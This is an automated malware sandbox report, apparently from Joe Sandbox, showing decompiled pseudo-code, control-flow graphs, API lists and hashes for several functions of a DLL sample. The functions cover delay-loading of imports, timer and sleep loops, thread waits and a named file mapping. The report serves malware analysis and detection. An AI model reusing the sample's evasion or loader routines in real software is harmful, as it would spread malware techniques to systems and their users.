                                                  • Not Executed
                                                  control_flow_graph 97 ecade5-ecae4a 98 ecae4c-ecae66 RaiseException 97->98 99 ecae6b-ecae95 97->99 100 ecb01b-ecb01f 98->100 101 ecae9a-ecaea6 99->101 102 ecae97 99->102 103 ecaea8-ecaeb3 101->103 104 ecaeb9-ecaebb 101->104 102->101 103->104 112 ecaffe-ecb005 103->112 105 ecaec1-ecaec8 104->105 106 ecaf63-ecaf6d 104->106 110 ecaed8-ecaee5 LoadLibraryA 105->110 111 ecaeca-ecaed6 105->111 108 ecaf6f-ecaf77 106->108 109 ecaf79-ecaf7b 106->109 108->109 113 ecaf7d-ecaf80 109->113 114 ecaff9-ecaffc 109->114 115 ecaf28-ecaf34 InterlockedExchange 110->115 116 ecaee7-ecaef7 GetLastError 110->116 111->110 111->115 120 ecb019 112->120 121 ecb007-ecb014 112->121 123 ecafae-ecafbc GetProcAddress 113->123 124 ecaf82-ecaf85 113->124 114->112 117 ecaf5c-ecaf5d FreeLibrary 115->117 118 ecaf36-ecaf3a 115->118 125 ecaef9-ecaf05 116->125 126 ecaf07-ecaf23 RaiseException 116->126 117->106 118->106 128 ecaf3c-ecaf48 LocalAlloc 118->128 120->100 121->120 123->114 127 ecafbe-ecafce GetLastError 123->127 124->123 129 ecaf87-ecaf92 124->129 125->115 125->126 126->100 130 ecafda-ecafdc 127->130 131 ecafd0-ecafd8 127->131 128->106 132 ecaf4a-ecaf5a 128->132 129->123 133 ecaf94-ecaf9a 129->133 130->114 135 ecafde-ecaff6 RaiseException 130->135 131->130 132->106 133->123 136 ecaf9c-ecaf9f 133->136 135->114 136->123 137 ecafa1-ecafac 136->137 137->114 137->123
                                                  C-Code - Quality: 51%
                                                  			E00ECADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xec0000;
				_t115 = _t139[3] + 0xec0000;
				_t131 = _t139[4] + 0xec0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xec0000;
				_v16 = _t139[5] + 0xec0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xec0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xecd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xecd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xecd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xecd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xecd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xecd198; // 0x0
										 *_t102 = _t125;
										 *0xecd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xecd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                  0x00ecadf4
                                                  0x00ecae0a
                                                  0x00ecae10
                                                  0x00ecae12
                                                  0x00ecae17
                                                  0x00ecae1d
                                                  0x00ecae22
                                                  0x00ecae25
                                                  0x00ecae33
                                                  0x00ecae3a
                                                  0x00ecae3d
                                                  0x00ecae40
                                                  0x00ecae41
                                                  0x00ecae44
                                                  0x00ecae47
                                                  0x00ecae4a
                                                  0x00ecae4f
                                                  0x00ecae5e
                                                  0x00000000
                                                  0x00ecae64
                                                  0x00ecae6e
                                                  0x00ecae78
                                                  0x00ecae7d
                                                  0x00ecae7f
                                                  0x00ecae89
                                                  0x00ecae8c
                                                  0x00ecae8f
                                                  0x00ecae95
                                                  0x00ecae97
                                                  0x00ecae97
                                                  0x00ecae9a
                                                  0x00ecae9d
                                                  0x00ecaea2
                                                  0x00ecaea6
                                                  0x00ecaeb9
                                                  0x00ecaebb
                                                  0x00ecaf63
                                                  0x00ecaf63
                                                  0x00ecaf6a
                                                  0x00ecaf6d
                                                  0x00ecaf77
                                                  0x00ecaf77
                                                  0x00ecaf7b
                                                  0x00ecaff9
                                                  0x00ecaffc
                                                  0x00ecaffe
                                                  0x00ecaffe
                                                  0x00ecb005
                                                  0x00ecb007
                                                  0x00ecb011
                                                  0x00ecb014
                                                  0x00ecb017
                                                  0x00ecb017
                                                  0x00000000
                                                  0x00ecaf7d
                                                  0x00ecaf80
                                                  0x00ecafae
                                                  0x00ecafb8
                                                  0x00ecafbc
                                                  0x00ecafc4
                                                  0x00ecafc7
                                                  0x00ecafce
                                                  0x00ecafd8
                                                  0x00ecafd8
                                                  0x00ecafdc
                                                  0x00ecafe1
                                                  0x00ecaff0
                                                  0x00ecaff6
                                                  0x00ecaff6
                                                  0x00ecafdc
                                                  0x00000000
                                                  0x00ecaf87
                                                  0x00ecaf8a
                                                  0x00ecaf92
                                                  0x00ecafa7
                                                  0x00ecafac
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecafac
                                                  0x00000000
                                                  0x00ecaf92
                                                  0x00ecaf80
                                                  0x00ecaf7b
                                                  0x00ecaec1
                                                  0x00ecaec8
                                                  0x00ecaed8
                                                  0x00ecaedb
                                                  0x00ecaee1
                                                  0x00ecaee5
                                                  0x00ecaf28
                                                  0x00ecaf34
                                                  0x00ecaf5d
                                                  0x00ecaf36
                                                  0x00ecaf3a
                                                  0x00ecaf40
                                                  0x00ecaf48
                                                  0x00ecaf4a
                                                  0x00ecaf4d
                                                  0x00ecaf53
                                                  0x00ecaf55
                                                  0x00ecaf55
                                                  0x00ecaf48
                                                  0x00ecaf3a
                                                  0x00000000
                                                  0x00ecaf34
                                                  0x00ecaeed
                                                  0x00ecaef0
                                                  0x00ecaef7
                                                  0x00ecaf07
                                                  0x00ecaf0a
                                                  0x00ecaf1a
                                                  0x00000000
                                                  0x00ecaf20
                                                  0x00ecaf01
                                                  0x00ecaf05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecaf05
                                                  0x00ecaed2
                                                  0x00ecaed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecaed6
                                                  0x00ecaeaf
                                                  0x00ecaeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ECAE5E
                                                  • LoadLibraryA.KERNELBASE(?), ref: 00ECAEDB
                                                  • GetLastError.KERNEL32 ref: 00ECAEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00ECAF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: c3b36cd93248e89d37025d3d03e878373fefd570ea754439745333b9a9c59d6d
                                                  • Instruction ID: 3299c3b17943bad252f874db4fd743c25df7e8cfe75cecc456b0f667c67debab
                                                  • Opcode Fuzzy Hash: c3b36cd93248e89d37025d3d03e878373fefd570ea754439745333b9a9c59d6d
                                                  • Instruction Fuzzy Hash: 4B814BB1A00209AFDB10CF99D985FAEB7F5AB48308F18903DE519E7250E772ED46CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC6786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 139 ec6786-ec67b2 memset CreateWaitableTimerA 140 ec67b8-ec6808 _allmul SetWaitableTimer WaitForMultipleObjects 139->140 141 ec6913-ec6919 GetLastError 139->141 143 ec680a-ec680d 140->143 144 ec6883-ec6888 140->144 142 ec691c-ec6923 141->142 145 ec680f call ec73fd 143->145 146 ec6818 143->146 147 ec6889-ec688d 144->147 152 ec6814-ec6816 145->152 151 ec6822 146->151 149 ec689d-ec68a1 147->149 150 ec688f-ec6897 HeapFree 147->150 149->147 153 ec68a3-ec68ac CloseHandle 149->153 150->149 154 ec6825-ec6829 151->154 152->146 152->151 153->142 155 ec683b-ec6864 call ec8504 154->155 156 ec682b-ec6832 154->156 160 ec68ae-ec68b3 155->160 161 ec6866-ec686f 155->161 156->155 157 ec6834 156->157 157->155 163 ec68b5-ec68bb 160->163 164 ec68d2-ec68da 160->164 161->154 162 ec6871-ec6880 call ec3bf1 161->162 162->144 163->144 165 ec68bd-ec68d0 call eca1b0 163->165 166 ec68e0-ec6908 _allmul SetWaitableTimer WaitForMultipleObjects 164->166 165->166 166->154 169 ec690e 166->169 169->144
                                                  C-Code - Quality: 83%
                                                  			E00EC6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xecd240);
					_v20 = 0;
					_v16 = 0;
					L00ECB0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xecd26c; // 0x33c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xecd24c = 5;
						} else {
							_t68 = E00EC73FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xecd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00EC8504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00EC3BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xecd244);
							goto L21;
						} else {
							__eflags =  *0xecd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00ECA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xecd248);
								L21:
								L00ECB0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xecd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                  0x00ec6786
                                                  0x00ec6798
                                                  0x00ec679b
                                                  0x00ec67a7
                                                  0x00ec67af
                                                  0x00ec67b2
                                                  0x00ec6919
                                                  0x00ec67b8
                                                  0x00ec67b8
                                                  0x00ec67ba
                                                  0x00ec67bf
                                                  0x00ec67c0
                                                  0x00ec67c6
                                                  0x00ec67c9
                                                  0x00ec67cc
                                                  0x00ec67da
                                                  0x00ec67e5
                                                  0x00ec67e8
                                                  0x00ec67ea
                                                  0x00ec67f7
                                                  0x00ec6801
                                                  0x00ec6805
                                                  0x00ec6808
                                                  0x00ec680d
                                                  0x00ec6818
                                                  0x00ec6818
                                                  0x00ec680f
                                                  0x00ec680f
                                                  0x00ec6816
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec6816
                                                  0x00ec6822
                                                  0x00000000
                                                  0x00ec6825
                                                  0x00ec6829
                                                  0x00ec6834
                                                  0x00ec6834
                                                  0x00ec683b
                                                  0x00ec6844
                                                  0x00ec684b
                                                  0x00ec6854
                                                  0x00ec6857
                                                  0x00ec685a
                                                  0x00ec6861
                                                  0x00ec6864
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec6866
                                                  0x00ec6869
                                                  0x00ec686c
                                                  0x00ec686f
                                                  0x00000000
                                                  0x00ec6871
                                                  0x00ec6880
                                                  0x00ec6880
                                                  0x00000000
                                                  0x00ec68ae
                                                  0x00ec68ae
                                                  0x00ec68b3
                                                  0x00ec68d2
                                                  0x00ec68d4
                                                  0x00ec68d9
                                                  0x00ec68da
                                                  0x00000000
                                                  0x00ec68b5
                                                  0x00ec68b5
                                                  0x00ec68bb
                                                  0x00000000
                                                  0x00ec68bd
                                                  0x00ec68bd
                                                  0x00ec68c2
                                                  0x00ec68c4
                                                  0x00ec68c9
                                                  0x00ec68ca
                                                  0x00ec68e0
                                                  0x00ec68e0
                                                  0x00ec68e8
                                                  0x00ec68f3
                                                  0x00ec68f6
                                                  0x00ec6901
                                                  0x00ec6903
                                                  0x00ec6905
                                                  0x00ec6908
                                                  0x00000000
                                                  0x00ec690e
                                                  0x00000000
                                                  0x00ec690e
                                                  0x00ec6908
                                                  0x00ec68bb
                                                  0x00000000
                                                  0x00ec68b3
                                                  0x00ec6883
                                                  0x00ec6885
                                                  0x00ec6888
                                                  0x00ec6889
                                                  0x00ec6889
                                                  0x00ec688d
                                                  0x00ec6897
                                                  0x00ec6897
                                                  0x00ec689d
                                                  0x00ec68a0
                                                  0x00ec68a0
                                                  0x00ec68a6
                                                  0x00ec68a6
                                                  0x00ec6923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 00EC679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00EC67A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00EC67CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00EC67E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00EC6801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00EC6897
                                                  • CloseHandle.KERNEL32(?), ref: 00EC68A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00EC68E0
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00EC2417,?), ref: 00EC68F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00EC6901
                                                    • Part of subcall function 00EC73FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03009388,00000000,?,7519F710,00000000,7519F730), ref: 00EC744C
                                                    • Part of subcall function 00EC73FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,030093C0,?,00000000,30314549,00000014,004F0053,0300937C), ref: 00EC74E9
                                                    • Part of subcall function 00EC73FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00EC6814), ref: 00EC74FB
                                                  • GetLastError.KERNEL32 ref: 00EC6913
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: ebebee60e038dee115b0081d4133ee4c7cc6ea879e200406ebe4f91f9450ed3e
                                                  • Instruction ID: 95245a3186f2cad11b624f42cbaf9741f1c0d603719f7967b73acdfabf4f27d4
                                                  • Opcode Fuzzy Hash: ebebee60e038dee115b0081d4133ee4c7cc6ea879e200406ebe4f91f9450ed3e
                                                  • Instruction Fuzzy Hash: 88517F71805228EECF149F95DD45EEEBFB8EF49324F205129F914F21A0D7728A46CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040163F, Relevance: 15.1, APIs: 10, Instructions: 98threadsleepsynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 40163f-401652 call 401850 175 401740-401742 172->175 176 401658 172->176 177 401659-401690 GetSystemTime SwitchToThread call 4018f4 Sleep 176->177 180 401692-401694 177->180 181 40169a-40169e 180->181 182 40173f 180->182 183 4016a0-4016ab call 401538 181->183 184 4016ef-40170a call 4012dc 181->184 182->175 189 4016e9 183->189 190 4016ad-4016bf GetLongPathNameW 183->190 191 401730-401732 GetLastError 184->191 192 40170c-40171a WaitForSingleObject 184->192 189->184 194 4016e1-4016e7 190->194 195 4016c1-4016d2 call 401de1 190->195 193 401735-40173b 191->193 196 401727-40172e CloseHandle 192->196 197 40171c-401721 GetExitCodeThread 192->197 193->182 198 40173d GetLastError 193->198 194->184 195->194 201 4016d4-4016da GetLongPathNameW call 401dfc 195->201 196->193 197->196 198->182 203 4016df 201->203 203->184
                                                  C-Code - Quality: 79%
                                                  			E0040163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E00401850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E004018F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E004012DC(E0040135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E00401538(_t44,  &_a4) != 0) {
					 *0x404138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x404138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E00401DE1(_t48 + _t14);
				 *0x404138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E00401DFC(_t43);
				goto L11;
			}




















                                                  0x00401646
                                                  0x0040164f
                                                  0x00401652
                                                  0x00401742
                                                  0x00401742
                                                  0x00401659
                                                  0x0040165d
                                                  0x00401663
                                                  0x00401671
                                                  0x00401672
                                                  0x00401675
                                                  0x00401678
                                                  0x00401681
                                                  0x00401684
                                                  0x0040168a
                                                  0x0040168d
                                                  0x00401694
                                                  0x0040173f
                                                  0x00000000
                                                  0x0040173f
                                                  0x0040169e
                                                  0x004016ef
                                                  0x004016ef
                                                  0x00401705
                                                  0x0040170a
                                                  0x00401732
                                                  0x0040170c
                                                  0x0040170f
                                                  0x00401717
                                                  0x0040171a
                                                  0x00401721
                                                  0x00401721
                                                  0x00401728
                                                  0x00401728
                                                  0x00401735
                                                  0x0040173b
                                                  0x0040173d
                                                  0x0040173d
                                                  0x00000000
                                                  0x0040173b
                                                  0x004016ab
                                                  0x004016e9
                                                  0x00000000
                                                  0x004016e9
                                                  0x004016ad
                                                  0x004016b0
                                                  0x004016b9
                                                  0x004016bb
                                                  0x004016bf
                                                  0x004016e1
                                                  0x004016e1
                                                  0x00000000
                                                  0x004016e1
                                                  0x004016c1
                                                  0x004016c6
                                                  0x004016cd
                                                  0x004016d2
                                                  0x00000000
                                                  0x00000000
                                                  0x004016d7
                                                  0x004016da
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00401850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,751463F0), ref: 0040185F
                                                    • Part of subcall function 00401850: GetVersion.KERNEL32 ref: 0040186E
                                                    • Part of subcall function 00401850: GetCurrentProcessId.KERNEL32 ref: 00401885
                                                    • Part of subcall function 00401850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                  • GetSystemTime.KERNEL32(?,00000000,751463F0), ref: 0040165D
                                                  • SwitchToThread.KERNEL32 ref: 00401663
                                                    • Part of subcall function 004018F4: VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                    • Part of subcall function 004018F4: memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                    • Part of subcall function 004018F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                  • Sleep.KERNELBASE(00000000,00000000), ref: 00401684
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016B9
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016D7
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040170F
                                                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 00401721
                                                  • CloseHandle.KERNEL32(00000000), ref: 00401728
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00401730
                                                  • GetLastError.KERNEL32 ref: 0040173D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                  • String ID:
                                                  • API String ID: 2280543912-0
                                                  • Opcode ID: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                  • Instruction ID: 3c547408fdc9ceb87cb50058a61b233f89e190b219f0f48a38aaaf96b39e067b
                                                  • Opcode Fuzzy Hash: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                  • Instruction Fuzzy Hash: 3D31A272901214ABCB10EFA59D8499F7ABDEF84351B14463BF901F32A0E738DA409B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC1B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00EC1B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00ECB0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xecd27c; // 0x213a5a8
				_t5 = _t13 + 0xece862; // 0x3008e0a
				_t6 = _t13 + 0xece59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00ECAD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0xecd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                  0x00ec1b2f
                                                  0x00ec1b37
                                                  0x00ec1b3b
                                                  0x00ec1b41
                                                  0x00ec1b46
                                                  0x00ec1b4b
                                                  0x00ec1b4e
                                                  0x00ec1b51
                                                  0x00ec1b56
                                                  0x00ec1b57
                                                  0x00ec1b5a
                                                  0x00ec1b5f
                                                  0x00ec1b66
                                                  0x00ec1b70
                                                  0x00ec1b72
                                                  0x00ec1b73
                                                  0x00ec1b76
                                                  0x00ec1b92
                                                  0x00ec1b98
                                                  0x00ec1b9c
                                                  0x00ec1bea
                                                  0x00ec1b9e
                                                  0x00ec1bab
                                                  0x00ec1bbb
                                                  0x00ec1bc3
                                                  0x00ec1bd5
                                                  0x00ec1bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec1bc5
